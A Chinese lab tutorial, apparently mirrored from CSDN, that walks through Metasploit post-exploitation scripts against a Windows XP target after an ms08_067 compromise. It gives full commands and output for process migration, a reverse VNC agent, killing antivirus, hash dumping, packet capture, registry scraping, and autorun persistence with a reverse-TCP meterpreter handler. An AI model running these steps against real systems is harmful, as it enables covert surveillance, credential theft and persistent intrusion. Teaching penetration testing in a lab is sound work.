Metasploit常用后渗透脚本——远程监视

Others 2021-11-20 12:10:38 views: null

文章目录

前言

本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程

测试环境 描述 ip
主机 kali 2020 192.168.1.113
靶机 winxp sp3 192.168.1.106

首先使用ms08_067渗透模块对靶机进行渗透测试,详细步骤看
ms08_067漏洞渗透步骤——MSF获取meterpreter权限

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:1216) at 2021-06-05 22:43:39 +0800

meterpreter >

一、迁移进程

迁移进程的目的是让我们对靶机的控制更加隐蔽和持久,因为使用漏洞进行渗透测试,会在靶机内建立一个进程,非常容易被发现,迁移到更安全的进程上就好了

meterpreter > run post/windows/manage/migrate

[*] Running module against WINXP-1
[*] Current server process: svchost.exe (1156)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3716
[+] Successfully migrated into process 3716

二、安装远程VNC会话

可以在受控系统上运行一个交互式的远程图形化工具(可以让你看到对方屏幕上的一举一动)

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.113 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\QuUcZHEDZcd.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.113:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "winxp-1"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

靶机桌面图片
1
vnc服务
2
可能出现的问题
对方桌面可能被锁定导致无法访问到桌面,可以使用screen_unlock脚本进行解锁

meterpreter > run screen_unlock

三、关闭杀毒软件

杀毒软件可以阻止攻击过程

meterpreter > run killav

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...

四、获取系统密码哈希值

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a6cc07586ea276fb6bb10b5e6fbc07e5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...

五、查看目标机上的所有流量

想要查看到目标系统上的所有网络流量,可以运行数据包记录脚本,所有被捕获的包都将以.pcap的文件格式保存下来,并能够被Wireshark解析,具体过程如下

meterpreter > run packetrecorder -i 1

[!] Meterpreter scripts are deprecated. Try post/windows/manage/rpcapd_start.
[!] Example: run post/windows/manage/rpcapd_start OPTION=value [...]
[*] Starting Packet capture on interface 1
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/WINXP-1_20210605.1818/WINXP-1_20210605.1818.cap
[*] Packet capture interval is 30 Seconds

六、提取系统信息

scraper脚本可以提取出所有系统信息,包括用户名和密码、下载全部注册表、挖掘密码哈希值等

meterpreter > run scraper
[*] New session on 192.168.1.106:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\WINDOWS\TEMP\XoAUidOI.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\WINDOWS\TEMP\nHtPKIjq.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\WINDOWS\TEMP\FaWycKSv.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\WINDOWS\TEMP\qKYvqXeA.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\WINDOWS\TEMP\DnovcEeK.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.1.106:445...

七、控制持久化

meterpreter的persistence脚本允许注入meterpreter代理,确保系统重启后还能连接到meterpreter。

meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.113

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20210605.2824/WINXP-1_20210605.2824.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.113 LPORT=443
[*] Persistent agent script is 99612 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\VAfovf.vbs
[*] Executing script C:\WINDOWS\TEMP\VAfovf.vbs
[+] Agent executed with PID 3384
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\moOyPewJil
meterpreter >

注入代理后,使用hanler进行监控

msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 443
lport => 443
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:443

八、查看更多脚本

打出run后按TAB键

meterpreter > run 
Display all 531 possibilities? (y or n)
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
......

后渗透脚本可以简化获取meterpreter权限后进一步获取更多信息的过程,除了后渗透脚本,一些后渗透命令也十分实用,详情看Metasploit后渗透命令大全讲解——超详细

总结

本文简单介绍了metesploit获取meterpreter权限后常用的后渗透脚本功能和实际操作,仅供学习

Guess you like

Origin blog.csdn.net/qq_19623861/article/details/117607371
Recommended
The sixth meeting of openKylin Community Ecology Committee was successfully held
Alibaba Cloud officially releases Tongyi Qianwen 2.5
Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter
Stack Overflow used my code to train large AI models and banned my account.
Pop!_OS’s COSMIC desktop completes App Store listing
Report: Django is still the first choice for 74% of developers
"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report
15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?
Ranking
Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures
Der M-Chip-Mac implementiert mehrere Android-Emulatoren
CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.
Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery
python3 pip ipython installation
A lot of python crawler source code sharing -- talk about the little thing about python crawler
Agile Sprint in Alpha Stage (7)
Access URL in Unity
FunctoinDemo form
MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq
Daily
More
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)

Code World

© 2018 codetd.com